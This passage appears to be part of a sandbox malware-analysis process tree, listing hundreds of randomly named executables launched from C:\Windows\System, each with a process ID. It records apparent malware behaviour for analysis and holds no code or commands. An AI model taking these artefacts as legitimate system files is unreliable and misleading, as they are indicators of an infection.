  PID:3752
- C:\Windows\System\nNgBQvO.exe
  C:\Windows\System\nNgBQvO.exe
  2⤵
  PID:3768
- C:\Windows\System\nxDqNvN.exe
  C:\Windows\System\nxDqNvN.exe
  2⤵
  PID:3784
- C:\Windows\System\CFPFJoj.exe
  C:\Windows\System\CFPFJoj.exe
  2⤵
  PID:3800
- C:\Windows\System\xsNQByo.exe
  C:\Windows\System\xsNQByo.exe
  2⤵
  PID:3816
- C:\Windows\System\TDfbBle.exe
  C:\Windows\System\TDfbBle.exe
  2⤵
  PID:3832
- C:\Windows\System\zBzhXPR.exe
  C:\Windows\System\zBzhXPR.exe
  2⤵
  PID:3848
- C:\Windows\System\lIDnGPy.exe
  C:\Windows\System\lIDnGPy.exe
  2⤵
  PID:3864
- C:\Windows\System\LYFZiqq.exe
  C:\Windows\System\LYFZiqq.exe
  2⤵
  PID:3880
- C:\Windows\System\gtHUMaF.exe
  C:\Windows\System\gtHUMaF.exe
  2⤵
  PID:3896
- C:\Windows\System\VXJVcVa.exe
  C:\Windows\System\VXJVcVa.exe
  2⤵
  PID:3912
- C:\Windows\System\CsbzWVC.exe
  C:\Windows\System\CsbzWVC.exe
  2⤵
  PID:3928
- C:\Windows\System\ELajdNp.exe
  C:\Windows\System\ELajdNp.exe
  2⤵
  PID:3944
- C:\Windows\System\McDsGsS.exe
  C:\Windows\System\McDsGsS.exe
  2⤵
  PID:3960
- C:\Windows\System\MdpKsrE.exe
  C:\Windows\System\MdpKsrE.exe
  2⤵
  PID:3976
- C:\Windows\System\rJWQpWZ.exe
  C:\Windows\System\rJWQpWZ.exe
  2⤵
  PID:3992
- C:\Windows\System\FEGStND.exe
  C:\Windows\System\FEGStND.exe
  2⤵
  PID:4008
- C:\Windows\System\uYqQWdf.exe
  C:\Windows\System\uYqQWdf.exe
  2⤵
  PID:4024
- C:\Windows\System\XyOtXCZ.exe
  C:\Windows\System\XyOtXCZ.exe
  2⤵
  PID:4040
- C:\Windows\System\WaiLOSH.exe
  C:\Windows\System\WaiLOSH.exe
  2⤵
  PID:4056
- C:\Windows\System\laRxjPZ.exe
  C:\Windows\System\laRxjPZ.exe
  2⤵
  PID:3120
- C:\Windows\System\arrgksx.exe
  C:\Windows\System\arrgksx.exe
  2⤵
  PID:3248
- C:\Windows\System\oREHPgC.exe
  C:\Windows\System\oREHPgC.exe
  2⤵
  PID:3316
- C:\Windows\System\yDhlVsN.exe
  C:\Windows\System\yDhlVsN.exe
  2⤵
  PID:4000
- C:\Windows\System\ZoeNvip.exe
  C:\Windows\System\ZoeNvip.exe
  2⤵
  PID:2640
- C:\Windows\System\ogYZVjL.exe
  C:\Windows\System\ogYZVjL.exe
  2⤵
  PID:1936
- C:\Windows\System\maHEzjq.exe
  C:\Windows\System\maHEzjq.exe
  2⤵
  PID:1584
- C:\Windows\System\VAnmPCK.exe
  C:\Windows\System\VAnmPCK.exe
  2⤵
  PID:2744
- C:\Windows\System\wlwUZzD.exe
  C:\Windows\System\wlwUZzD.exe
  2⤵
  PID:2644
- C:\Windows\System\DAxYUym.exe
  C:\Windows\System\DAxYUym.exe
  2⤵
  PID:3560
- C:\Windows\System\RHMAhxY.exe
  C:\Windows\System\RHMAhxY.exe
  2⤵
  PID:3600
- C:\Windows\System\RhoWjnx.exe
  C:\Windows\System\RhoWjnx.exe
  2⤵
  PID:316
- C:\Windows\System\pzcLyzZ.exe
  C:\Windows\System\pzcLyzZ.exe
  2⤵
  PID:2104
- C:\Windows\System\lcvmKXl.exe
  C:\Windows\System\lcvmKXl.exe
  2⤵
  PID:2984
- C:\Windows\System\IkwOgQh.exe
  C:\Windows\System\IkwOgQh.exe
  2⤵
  PID:3284
- C:\Windows\System\TQqSkXc.exe
  C:\Windows\System\TQqSkXc.exe
  2⤵
  PID:4080
- C:\Windows\System\IQKiHez.exe
  C:\Windows\System\IQKiHez.exe
  2⤵
  PID:4088
- C:\Windows\System\INdocSe.exe
  C:\Windows\System\INdocSe.exe
  2⤵
  PID:2908
- C:\Windows\System\SrNiQrk.exe
  C:\Windows\System\SrNiQrk.exe
  2⤵
  PID:608
- C:\Windows\System\ATGbhdG.exe
  C:\Windows\System\ATGbhdG.exe
  2⤵
  PID:1964
- C:\Windows\System\fQWxKzR.exe
  C:\Windows\System\fQWxKzR.exe
  2⤵
  PID:3004
- C:\Windows\System\IpazYWQ.exe
  C:\Windows\System\IpazYWQ.exe
  2⤵
  PID:1600
- C:\Windows\System\bjNZBLj.exe
  C:\Windows\System\bjNZBLj.exe
  2⤵
  PID:2252
- C:\Windows\System\shKDpEa.exe
  C:\Windows\System\shKDpEa.exe
  2⤵
  PID:2392
- C:\Windows\System\ySNLrCE.exe
  C:\Windows\System\ySNLrCE.exe
  2⤵
  PID:2268
- C:\Windows\System\uqRYhWE.exe
  C:\Windows\System\uqRYhWE.exe
  2⤵
  PID:3236
- C:\Windows\System\SBNCUol.exe
  C:\Windows\System\SBNCUol.exe
  2⤵
  PID:3332
- C:\Windows\System\qjeyivt.exe
  C:\Windows\System\qjeyivt.exe
  2⤵
  PID:3396
- C:\Windows\System\TPLGqzG.exe
  C:\Windows\System\TPLGqzG.exe
  2⤵
  PID:3488
- C:\Windows\System\JfphJia.exe
  C:\Windows\System\JfphJia.exe
  2⤵
  PID:3528
- C:\Windows\System\bQfpzeq.exe
  C:\Windows\System\bQfpzeq.exe
  2⤵
  PID:3696
- C:\Windows\System\BnSDIhp.exe
  C:\Windows\System\BnSDIhp.exe
  2⤵
  PID:3760
- C:\Windows\System\eIxjmTy.exe
  C:\Windows\System\eIxjmTy.exe
  2⤵
  PID:3860
- C:\Windows\System\MsVqyxW.exe
  C:\Windows\System\MsVqyxW.exe
  2⤵
  PID:3924
- C:\Windows\System\fpZfTYv.exe
  C:\Windows\System\fpZfTYv.exe
  2⤵
  PID:4016
- C:\Windows\System\qevzwsg.exe
  C:\Windows\System\qevzwsg.exe
  2⤵
  PID:1632
- C:\Windows\System\lZSyuxE.exe
  C:\Windows\System\lZSyuxE.exe
  2⤵
  PID:2072
- C:\Windows\System\lKXxpCq.exe
  C:\Windows\System\lKXxpCq.exe
  2⤵
  PID:3220
- C:\Windows\System\HSKuRLm.exe
  C:\Windows\System\HSKuRLm.exe
  2⤵
  PID:3412
- C:\Windows\System\rINpUKR.exe
  C:\Windows\System\rINpUKR.exe
  2⤵
  PID:3476
- C:\Windows\System\mTstXnQ.exe
  C:\Windows\System\mTstXnQ.exe
  2⤵
  PID:3548
- C:\Windows\System\IzqcnDv.exe
  C:\Windows\System\IzqcnDv.exe
  2⤵
  PID:3652
- C:\Windows\System\hpgTlVx.exe
  C:\Windows\System\hpgTlVx.exe
  2⤵
  PID:3716
- C:\Windows\System\fdctNTl.exe
  C:\Windows\System\fdctNTl.exe
  2⤵
  PID:3780
- C:\Windows\System\kWxjrLA.exe
  C:\Windows\System\kWxjrLA.exe
  2⤵
  PID:3844
- C:\Windows\System\otxOHVv.exe
  C:\Windows\System\otxOHVv.exe
  2⤵
  PID:3908
- C:\Windows\System\aoECNMk.exe
  C:\Windows\System\aoECNMk.exe
  2⤵
  PID:3968
- C:\Windows\System\ISoSLar.exe
  C:\Windows\System\ISoSLar.exe
  2⤵
  PID:2024
- C:\Windows\System\EciqPOI.exe
  C:\Windows\System\EciqPOI.exe
  2⤵
  PID:1932
- C:\Windows\System\FKwatBr.exe
  C:\Windows\System\FKwatBr.exe
  2⤵
  PID:3200
- C:\Windows\System\kJIQabc.exe
  C:\Windows\System\kJIQabc.exe
  2⤵
  PID:3108
- C:\Windows\System\AMAFeHW.exe
  C:\Windows\System\AMAFeHW.exe
  2⤵
  PID:2224
- C:\Windows\System\OsyZdek.exe
  C:\Windows\System\OsyZdek.exe
  2⤵
  PID:2060
- C:\Windows\System\hWooJqm.exe
  C:\Windows\System\hWooJqm.exe
  2⤵
  PID:1168
- C:\Windows\System\tCLIzHB.exe
  C:\Windows\System\tCLIzHB.exe
  2⤵
  PID:1524
- C:\Windows\System\XJErVtG.exe
  C:\Windows\System\XJErVtG.exe
  2⤵
  PID:1616
- C:\Windows\System\FuPdgCj.exe
  C:\Windows\System\FuPdgCj.exe
  2⤵
  PID:1676
- C:\Windows\System\kWQKvcb.exe
  C:\Windows\System\kWQKvcb.exe
  2⤵
  PID:1572
- C:\Windows\System\ndgHYfJ.exe
  C:\Windows\System\ndgHYfJ.exe
  2⤵
  PID:3312
- C:\Windows\System\szoXiQa.exe
  C:\Windows\System\szoXiQa.exe
  2⤵
  PID:2176
- C:\Windows\System\MqRHzQK.exe
  C:\Windows\System\MqRHzQK.exe
  2⤵
  PID:2056
- C:\Windows\System\kqZjXTW.exe
  C:\Windows\System\kqZjXTW.exe
  2⤵
  PID:2768
- C:\Windows\System\XcdsvYb.exe
  C:\Windows\System\XcdsvYb.exe
  2⤵
  PID:2708
- C:\Windows\System\ahNLyuz.exe
  C:\Windows\System\ahNLyuz.exe
  2⤵
  PID:1300
- C:\Windows\System\CEdZELN.exe
  C:\Windows\System\CEdZELN.exe
  2⤵
  PID:880
- C:\Windows\System\bFAuLJT.exe
  C:\Windows\System\bFAuLJT.exe
  2⤵
  PID:1724
- C:\Windows\System\shpjeSB.exe
  C:\Windows\System\shpjeSB.exe
  2⤵
  PID:1704
- C:\Windows\System\juKixlp.exe
  C:\Windows\System\juKixlp.exe
  2⤵
  PID:2872
- C:\Windows\System\DxUeiFJ.exe
  C:\Windows\System\DxUeiFJ.exe
  2⤵
  PID:380
- C:\Windows\System\tnOmbHN.exe
  C:\Windows\System\tnOmbHN.exe
  2⤵
  PID:324
- C:\Windows\System\VXNWimS.exe
  C:\Windows\System\VXNWimS.exe
  2⤵
  PID:3300
- C:\Windows\System\dZnatlm.exe
  C:\Windows\System\dZnatlm.exe
  2⤵
  PID:3364
- C:\Windows\System\sIytdVC.exe
  C:\Windows\System\sIytdVC.exe
  2⤵
  PID:2368
- C:\Windows\System\NfKUTTP.exe
  C:\Windows\System\NfKUTTP.exe
  2⤵
  PID:684
- C:\Windows\System\JlqIXKB.exe
  C:\Windows\System\JlqIXKB.exe
  2⤵
  PID:3604
- C:\Windows\System\WqvFYHD.exe
  C:\Windows\System\WqvFYHD.exe
  2⤵
  PID:588
- C:\Windows\System\hApmFPL.exe
  C:\Windows\System\hApmFPL.exe
  2⤵
  PID:3632
- C:\Windows\System\pmatqcE.exe
  C:\Windows\System\pmatqcE.exe
  2⤵
  PID:3828
- C:\Windows\System\qsqqvjy.exe
  C:\Windows\System\qsqqvjy.exe
  2⤵
  PID:3920
- C:\Windows\System\jlvMImt.exe
  C:\Windows\System\jlvMImt.exe
  2⤵
  PID:4048
- C:\Windows\System\QxYqhtJ.exe
  C:\Windows\System\QxYqhtJ.exe
  2⤵
  PID:3188
- C:\Windows\System\izkImPD.exe
  C:\Windows\System\izkImPD.exe
  2⤵
  PID:3472
- C:\Windows\System\eFogdyd.exe
  C:\Windows\System\eFogdyd.exe
  2⤵
  PID:3616
- C:\Windows\System\bXpZyNJ.exe
  C:\Windows\System\bXpZyNJ.exe
  2⤵
  PID:3508
- C:\Windows\System\rwDVTcU.exe
  C:\Windows\System\rwDVTcU.exe
  2⤵
  PID:3748
- C:\Windows\System\iyYQIwy.exe
  C:\Windows\System\iyYQIwy.exe
  2⤵
  PID:1620
- C:\Windows\System\IFioOhO.exe
  C:\Windows\System\IFioOhO.exe
  2⤵
  PID:3712
- C:\Windows\System\AMkGIvx.exe
  C:\Windows\System\AMkGIvx.exe
  2⤵
  PID:2664
- C:\Windows\System\jRRlwDt.exe
  C:\Windows\System\jRRlwDt.exe
  2⤵
  PID:4104
- C:\Windows\System\sFjnMwf.exe
  C:\Windows\System\sFjnMwf.exe
  2⤵
  PID:4120
- C:\Windows\System\agYTehm.exe
  C:\Windows\System\agYTehm.exe
  2⤵
  PID:4136
- C:\Windows\System\BJRrGjb.exe
  C:\Windows\System\BJRrGjb.exe
  2⤵
  PID:4156
- C:\Windows\System\xjvoAps.exe
  C:\Windows\System\xjvoAps.exe
  2⤵
  PID:4172
- C:\Windows\System\qnWnSMP.exe
  C:\Windows\System\qnWnSMP.exe
  2⤵
  PID:4188
- C:\Windows\System\tDzBjnt.exe
  C:\Windows\System\tDzBjnt.exe
  2⤵
  PID:4204
- C:\Windows\System\qvVwPiS.exe
  C:\Windows\System\qvVwPiS.exe
  2⤵
  PID:4220
- C:\Windows\System\tHaFadg.exe
  C:\Windows\System\tHaFadg.exe
  2⤵
  PID:4236
- C:\Windows\System\VVpkXGH.exe
  C:\Windows\System\VVpkXGH.exe
  2⤵
  PID:4252
- C:\Windows\System\CfcNPVp.exe
  C:\Windows\System\CfcNPVp.exe
  2⤵
  PID:4268
- C:\Windows\System\ppPYZwE.exe
  C:\Windows\System\ppPYZwE.exe
  2⤵
  PID:4288
- C:\Windows\System\tGkIjmo.exe
  C:\Windows\System\tGkIjmo.exe
  2⤵
  PID:4304
- C:\Windows\System\LgRIcTR.exe
  C:\Windows\System\LgRIcTR.exe
  2⤵
  PID:4320
- C:\Windows\System\WCzYlyW.exe
  C:\Windows\System\WCzYlyW.exe
  2⤵
  PID:4336
- C:\Windows\System\ePnoCDc.exe
  C:\Windows\System\ePnoCDc.exe
  2⤵
  PID:4352
- C:\Windows\System\HYFZPuy.exe
  C:\Windows\System\HYFZPuy.exe
  2⤵
  PID:4368
- C:\Windows\System\kAHJFtf.exe
  C:\Windows\System\kAHJFtf.exe
  2⤵
  PID:4384
- C:\Windows\System\CIMtylJ.exe
  C:\Windows\System\CIMtylJ.exe
  2⤵
  PID:4460
- C:\Windows\System\DNTUKxt.exe
  C:\Windows\System\DNTUKxt.exe
  2⤵
  PID:4476
- C:\Windows\System\MKSsLJx.exe
  C:\Windows\System\MKSsLJx.exe
  2⤵
  PID:4492
- C:\Windows\System\alfsTBb.exe
  C:\Windows\System\alfsTBb.exe
  2⤵
  PID:4508
- C:\Windows\System\GSARiPF.exe
  C:\Windows\System\GSARiPF.exe
  2⤵
  PID:4524
- C:\Windows\System\fLELAnQ.exe
  C:\Windows\System\fLELAnQ.exe
  2⤵
  PID:4540
- C:\Windows\System\zwqxvGM.exe
  C:\Windows\System\zwqxvGM.exe
  2⤵
  PID:4556
- C:\Windows\System\QBNxLNs.exe
  C:\Windows\System\QBNxLNs.exe
  2⤵
  PID:4572
- C:\Windows\System\zjGPJjU.exe
  C:\Windows\System\zjGPJjU.exe
  2⤵
  PID:4588
- C:\Windows\System\XgrWwcM.exe
  C:\Windows\System\XgrWwcM.exe
  2⤵
  PID:4608
- C:\Windows\System\okdmPlA.exe
  C:\Windows\System\okdmPlA.exe
  2⤵
  PID:4624
- C:\Windows\System\GLqDFZY.exe
  C:\Windows\System\GLqDFZY.exe
  2⤵
  PID:4640
- C:\Windows\System\XSXMZjf.exe
  C:\Windows\System\XSXMZjf.exe
  2⤵
  PID:4656
- C:\Windows\System\LRfOOUU.exe
  C:\Windows\System\LRfOOUU.exe
  2⤵
  PID:4672
- C:\Windows\System\oaarlRJ.exe
  C:\Windows\System\oaarlRJ.exe
  2⤵
  PID:4688
- C:\Windows\System\wEUIoNc.exe
  C:\Windows\System\wEUIoNc.exe
  2⤵
  PID:4704
- C:\Windows\System\BmztmiO.exe
  C:\Windows\System\BmztmiO.exe
  2⤵
  PID:4736
- C:\Windows\System\WZfAtVP.exe
  C:\Windows\System\WZfAtVP.exe
  2⤵
  PID:4764
- C:\Windows\System\NxwAYEf.exe
  C:\Windows\System\NxwAYEf.exe
  2⤵
  PID:4780
- C:\Windows\System\OExeevP.exe
  C:\Windows\System\OExeevP.exe
  2⤵
  PID:4804
- C:\Windows\System\dJJRDQc.exe
  C:\Windows\System\dJJRDQc.exe
  2⤵
  PID:4820
- C:\Windows\System\jcPAwkA.exe
  C:\Windows\System\jcPAwkA.exe
  2⤵
  PID:4836
- C:\Windows\System\BRuwhjs.exe
  C:\Windows\System\BRuwhjs.exe
  2⤵
  PID:4856
- C:\Windows\System\KFKfdOh.exe
  C:\Windows\System\KFKfdOh.exe
  2⤵
  PID:4872
- C:\Windows\System\SXBmjWh.exe
  C:\Windows\System\SXBmjWh.exe
  2⤵
  PID:4888
- C:\Windows\System\ceaYpHe.exe
  C:\Windows\System\ceaYpHe.exe
  2⤵
  PID:4904
- C:\Windows\System\EeAlRJl.exe
  C:\Windows\System\EeAlRJl.exe
  2⤵
  PID:4920
- C:\Windows\System\NPAAHZS.exe
  C:\Windows\System\NPAAHZS.exe
  2⤵
  PID:4940
- C:\Windows\System\reTvkxs.exe
  C:\Windows\System\reTvkxs.exe
  2⤵
  PID:4956
- C:\Windows\System\NEGpeok.exe
  C:\Windows\System\NEGpeok.exe
  2⤵
  PID:4972
- C:\Windows\System\PtrjofN.exe
  C:\Windows\System\PtrjofN.exe
  2⤵
  PID:4996
- C:\Windows\System\IEAplKe.exe
  C:\Windows\System\IEAplKe.exe
  2⤵
  PID:5012
- C:\Windows\System\AaQLxfZ.exe
  C:\Windows\System\AaQLxfZ.exe
  2⤵
  PID:5028
- C:\Windows\System\zchxcBG.exe
  C:\Windows\System\zchxcBG.exe
  2⤵
  PID:5064
- C:\Windows\System\dlJemnN.exe
  C:\Windows\System\dlJemnN.exe
  2⤵
  PID:5080
- C:\Windows\System\rGiqZqz.exe
  C:\Windows\System\rGiqZqz.exe
  2⤵
  PID:5096
- C:\Windows\System\NOEEpHw.exe
  C:\Windows\System\NOEEpHw.exe
  2⤵
  PID:5112
- C:\Windows\System\OxKlVsu.exe
  C:\Windows\System\OxKlVsu.exe
  2⤵
  PID:2080
- C:\Windows\System\pstqZHf.exe
  C:\Windows\System\pstqZHf.exe
  2⤵
  PID:2940
- C:\Windows\System\pfzvqbc.exe
  C:\Windows\System\pfzvqbc.exe
  2⤵
  PID:4076
- C:\Windows\System\KNCaOlo.exe
  C:\Windows\System\KNCaOlo.exe
  2⤵
  PID:2660
- C:\Windows\System\dEYnwDI.exe
  C:\Windows\System\dEYnwDI.exe
  2⤵
  PID:4296
- C:\Windows\System\DwEKwDd.exe
  C:\Windows\System\DwEKwDd.exe
  2⤵
  PID:4412
- C:\Windows\System\txzedDd.exe
  C:\Windows\System\txzedDd.exe
  2⤵
  PID:4428
- C:\Windows\System\fLGxoIh.exe
  C:\Windows\System\fLGxoIh.exe
  2⤵
  PID:4444
- C:\Windows\System\FyYVbMP.exe
  C:\Windows\System\FyYVbMP.exe
  2⤵
  PID:4360
- C:\Windows\System\muyyqWL.exe
  C:\Windows\System\muyyqWL.exe
  2⤵
  PID:4128
- C:\Windows\System\hobypMG.exe
  C:\Windows\System\hobypMG.exe
  2⤵
  PID:4468
- C:\Windows\System\ZGFrJXt.exe
  C:\Windows\System\ZGFrJXt.exe
  2⤵
  PID:4380
- C:\Windows\System\SwrsOps.exe
  C:\Windows\System\SwrsOps.exe
  2⤵
  PID:4596
- C:\Windows\System\KUqGjjf.exe
  C:\Windows\System\KUqGjjf.exe
  2⤵
  PID:3376
- C:\Windows\System\vMohhQv.exe
  C:\Windows\System\vMohhQv.exe
  2⤵
  PID:3204
- C:\Windows\System\uvBDqIs.exe
  C:\Windows\System\uvBDqIs.exe
  2⤵
  PID:4144
- C:\Windows\System\oAAadIF.exe
  C:\Windows\System\oAAadIF.exe
  2⤵
  PID:4184
- C:\Windows\System\nQSdbAZ.exe
  C:\Windows\System\nQSdbAZ.exe
  2⤵
  PID:4244
- C:\Windows\System\UFbULNg.exe
  C:\Windows\System\UFbULNg.exe
  2⤵
  PID:4744
- C:\Windows\System\rRJXZFs.exe
  C:\Windows\System\rRJXZFs.exe
  2⤵
  PID:4664
- C:\Windows\System\ngOKcwa.exe
  C:\Windows\System\ngOKcwa.exe
  2⤵
  PID:4484
- C:\Windows\System\ovbvlGi.exe
  C:\Windows\System\ovbvlGi.exe
  2⤵
  PID:4548
- C:\Windows\System\fBhZMxC.exe
  C:\Windows\System\fBhZMxC.exe
  2⤵
  PID:4756
- C:\Windows\System\kOsQSux.exe
  C:\Windows\System\kOsQSux.exe
  2⤵
  PID:4828
- C:\Windows\System\YQgRKwA.exe
  C:\Windows\System\YQgRKwA.exe
  2⤵
  PID:4636
- C:\Windows\System\QmCqagC.exe
  C:\Windows\System\QmCqagC.exe
  2⤵
  PID:4812
- C:\Windows\System\fOoNKdh.exe
  C:\Windows\System\fOoNKdh.exe
  2⤵
  PID:4952
- C:\Windows\System\GcSdhPd.exe
  C:\Windows\System\GcSdhPd.exe
  2⤵
  PID:5036
- C:\Windows\System\JHBmNnP.exe
  C:\Windows\System\JHBmNnP.exe
  2⤵
  PID:5048
- C:\Windows\System\DzGnkLl.exe
  C:\Windows\System\DzGnkLl.exe
  2⤵
  PID:5060
- C:\Windows\System\GrMOkKO.exe
  C:\Windows\System\GrMOkKO.exe
  2⤵
  PID:2792
- C:\Windows\System\dXRJZtp.exe
  C:\Windows\System\dXRJZtp.exe
  2⤵
  PID:2692
- C:\Windows\System\mfvcQcv.exe
  C:\Windows\System\mfvcQcv.exe
  2⤵
  PID:5092
- C:\Windows\System\yTBawLA.exe
  C:\Windows\System\yTBawLA.exe
  2⤵
  PID:2716
- C:\Windows\System\aiiyEJh.exe
  C:\Windows\System\aiiyEJh.exe
  2⤵
  PID:5108
- C:\Windows\System\TMWfmXb.exe
  C:\Windows\System\TMWfmXb.exe
  2⤵
  PID:840
- C:\Windows\System\nRAAEUt.exe
  C:\Windows\System\nRAAEUt.exe
  2⤵
  PID:3296
- C:\Windows\System\PqWAimp.exe
  C:\Windows\System\PqWAimp.exe
  2⤵
  PID:3728
- C:\Windows\System\YuupezL.exe
  C:\Windows\System\YuupezL.exe
  2⤵
  PID:3732
- C:\Windows\System\RDLupOy.exe
  C:\Windows\System\RDLupOy.exe
  2⤵
  PID:3796
- C:\Windows\System\CxkqrRF.exe
  C:\Windows\System\CxkqrRF.exe
  2⤵
  PID:3940
- C:\Windows\System\gAaATRd.exe
  C:\Windows\System\gAaATRd.exe
  2⤵
  PID:2724
- C:\Windows\System\UYbvpaI.exe
  C:\Windows\System\UYbvpaI.exe
  2⤵
  PID:3136
- C:\Windows\System\bwYrIRO.exe
  C:\Windows\System\bwYrIRO.exe
  2⤵
  PID:2472
- C:\Windows\System\enYmDFO.exe
  C:\Windows\System\enYmDFO.exe
  2⤵
  PID:3216
- C:\Windows\System\ooiBmSZ.exe
  C:\Windows\System\ooiBmSZ.exe
  2⤵
  PID:4228
- C:\Windows\System\bvrjXKE.exe
  C:\Windows\System\bvrjXKE.exe
  2⤵
  PID:4328
- C:\Windows\System\vhgsEkf.exe
  C:\Windows\System\vhgsEkf.exe
  2⤵
  PID:2696
- C:\Windows\System\xyOuGtT.exe
  C:\Windows\System\xyOuGtT.exe
  2⤵
  PID:4312
- C:\Windows\System\vwiEylp.exe
  C:\Windows\System\vwiEylp.exe
  2⤵
  PID:4376
- C:\Windows\System\LVzduNH.exe
  C:\Windows\System\LVzduNH.exe
  2⤵
  PID:4564
- C:\Windows\System\pSKZInQ.exe
  C:\Windows\System\pSKZInQ.exe
  2⤵
  PID:4112
- C:\Windows\System\XXYPFiU.exe
  C:\Windows\System\XXYPFiU.exe
  2⤵
  PID:4456
- C:\Windows\System\axahsOT.exe
  C:\Windows\System\axahsOT.exe
  2⤵
  PID:4280
- C:\Windows\System\ewVkLlS.exe
  C:\Windows\System\ewVkLlS.exe
  2⤵
  PID:4788
- C:\Windows\System\MfmqPvX.exe
  C:\Windows\System\MfmqPvX.exe
  2⤵
  PID:4800
- C:\Windows\System\nvkkHWy.exe
  C:\Windows\System\nvkkHWy.exe
  2⤵
  PID:4604
- C:\Windows\System\mgjRsEp.exe
  C:\Windows\System\mgjRsEp.exe
  2⤵
  PID:4864
- C:\Windows\System\CCaHgEG.exe
  C:\Windows\System\CCaHgEG.exe
  2⤵
  PID:4844
- C:\Windows\System\OvGUznb.exe
  C:\Windows\System\OvGUznb.exe
  2⤵
  PID:4580
- C:\Windows\System\YRQeMNs.exe
  C:\Windows\System\YRQeMNs.exe
  2⤵
  PID:4772
- C:\Windows\System\zPbosVg.exe
  C:\Windows\System\zPbosVg.exe
  2⤵
  PID:4896
- C:\Windows\System\yOwmhxT.exe
  C:\Windows\System\yOwmhxT.exe
  2⤵
  PID:4984
- C:\Windows\System\qSQgDrI.exe
  C:\Windows\System\qSQgDrI.exe
  2⤵
  PID:4964
- C:\Windows\System\QCfYEyX.exe
  C:\Windows\System\QCfYEyX.exe
  2⤵
  PID:5020
- C:\Windows\System\Embfgkn.exe
  C:\Windows\System\Embfgkn.exe
  2⤵
  PID:2528
- C:\Windows\System\XFFDPWw.exe
  C:\Windows\System\XFFDPWw.exe
  2⤵
  PID:2636
- C:\Windows\System\ylhOtla.exe
  C:\Windows\System\ylhOtla.exe
  2⤵
  PID:3140
- C:\Windows\System\PRQtqIu.exe
  C:\Windows\System\PRQtqIu.exe
  2⤵
  PID:4796
- C:\Windows\System\PGlVRJf.exe
  C:\Windows\System\PGlVRJf.exe
  2⤵
  PID:3568
- C:\Windows\System\LfjPXVf.exe
  C:\Windows\System\LfjPXVf.exe
  2⤵
  PID:484
- C:\Windows\System\liPWQDn.exe
  C:\Windows\System\liPWQDn.exe
  2⤵
  PID:624
- C:\Windows\System\QhcZJib.exe
  C:\Windows\System\QhcZJib.exe
  2⤵
  PID:2844
- C:\Windows\System\GFHcHVR.exe
  C:\Windows\System\GFHcHVR.exe
  2⤵
  PID:2248
- C:\Windows\System\urOBoOz.exe
  C:\Windows\System\urOBoOz.exe
  2⤵
  PID:1940
- C:\Windows\System\JBHOuDz.exe
  C:\Windows\System\JBHOuDz.exe
  2⤵
  PID:3428
- C:\Windows\System\GwzVBAO.exe
  C:\Windows\System\GwzVBAO.exe
  2⤵
  PID:4264
- C:\Windows\System\RRGGdJQ.exe
  C:\Windows\System\RRGGdJQ.exe
  2⤵
  PID:3680
- C:\Windows\System\uMfsNFN.exe
  C:\Windows\System\uMfsNFN.exe
  2⤵
  PID:4364
- C:\Windows\System\FTMSSxU.exe
  C:\Windows\System\FTMSSxU.exe
  2⤵
  PID:4232
- C:\Windows\System\AzAuzvm.exe
  C:\Windows\System\AzAuzvm.exe
  2⤵
  PID:4520
- C:\Windows\System\pldhdGu.exe
  C:\Windows\System\pldhdGu.exe
  2⤵
  PID:4712
- C:\Windows\System\gMVlvOB.exe
  C:\Windows\System\gMVlvOB.exe
  2⤵
  PID:4652
- C:\Windows\System\vHMCoSz.exe
  C:\Windows\System\vHMCoSz.exe
  2⤵
  PID:4912
- C:\Windows\System\wBrSbNN.exe
  C:\Windows\System\wBrSbNN.exe
  2⤵
  PID:5040
- C:\Windows\System\PaAIKzt.exe
  C:\Windows\System\PaAIKzt.exe
  2⤵
  PID:3380
- C:\Windows\System\YRhJFYh.exe
  C:\Windows\System\YRhJFYh.exe
  2⤵
  PID:4216
- C:\Windows\System\wxlNBwr.exe
  C:\Windows\System\wxlNBwr.exe
  2⤵
  PID:4748
- C:\Windows\System\CeUDwfW.exe
  C:\Windows\System\CeUDwfW.exe
  2⤵
  PID:4680
- C:\Windows\System\OfCypeQ.exe
  C:\Windows\System\OfCypeQ.exe
  2⤵
  PID:4936
- C:\Windows\System\ihGzcwp.exe
  C:\Windows\System\ihGzcwp.exe
  2⤵
  PID:2580
- C:\Windows\System\bSVAPKY.exe
  C:\Windows\System\bSVAPKY.exe
  2⤵
  PID:2536
- C:\Windows\System\VCmZpqH.exe
  C:\Windows\System\VCmZpqH.exe
  2⤵
  PID:1976
- C:\Windows\System\QPKUNrG.exe
  C:\Windows\System\QPKUNrG.exe
  2⤵
  PID:4348
- C:\Windows\System\jBGanHk.exe
  C:\Windows\System\jBGanHk.exe
  2⤵
  PID:2020
- C:\Windows\System\wMFZala.exe
  C:\Windows\System\wMFZala.exe
  2⤵
  PID:1104
- C:\Windows\System\SCFUqAO.exe
  C:\Windows\System\SCFUqAO.exe
  2⤵
  PID:3268
- C:\Windows\System\SdLTwYY.exe
  C:\Windows\System\SdLTwYY.exe
  2⤵
  PID:4168
- C:\Windows\System\LamBCjp.exe
  C:\Windows\System\LamBCjp.exe
  2⤵
  PID:3444
- C:\Windows\System\IXQunDl.exe
  C:\Windows\System\IXQunDl.exe
  2⤵
  PID:5056
- C:\Windows\System\ZJMjsWg.exe
  C:\Windows\System\ZJMjsWg.exe
  2⤵
  PID:4452
- C:\Windows\System\TcCMtdz.exe
  C:\Windows\System\TcCMtdz.exe
  2⤵
  PID:4980
- C:\Windows\System\avhmNFl.exe
  C:\Windows\System\avhmNFl.exe
  2⤵
  PID:4852
- C:\Windows\System\bcutWAX.exe
  C:\Windows\System\bcutWAX.exe
  2⤵
  PID:2784
- C:\Windows\System\xfTKazi.exe
  C:\Windows\System\xfTKazi.exe
  2⤵
  PID:4716
- C:\Windows\System\SscvLiK.exe
  C:\Windows\System\SscvLiK.exe
  2⤵
  PID:4344
- C:\Windows\System\rHxvDAq.exe
  C:\Windows\System\rHxvDAq.exe
  2⤵
  PID:5128
- C:\Windows\System\aYHbULB.exe
  C:\Windows\System\aYHbULB.exe
  2⤵
  PID:5144
- C:\Windows\System\ZSeRzjP.exe
  C:\Windows\System\ZSeRzjP.exe
  2⤵
  PID:5164
- C:\Windows\System\CLQExnN.exe
  C:\Windows\System\CLQExnN.exe
  2⤵
  PID:5180
- C:\Windows\System\cLjQziY.exe
  C:\Windows\System\cLjQziY.exe
  2⤵
  PID:5196
- C:\Windows\System\DNDwGpc.exe
  C:\Windows\System\DNDwGpc.exe
  2⤵
  PID:5212
- C:\Windows\System\vGSULii.exe
  C:\Windows\System\vGSULii.exe
  2⤵
  PID:5228
- C:\Windows\System\tIPwODK.exe
  C:\Windows\System\tIPwODK.exe
  2⤵
  PID:5244
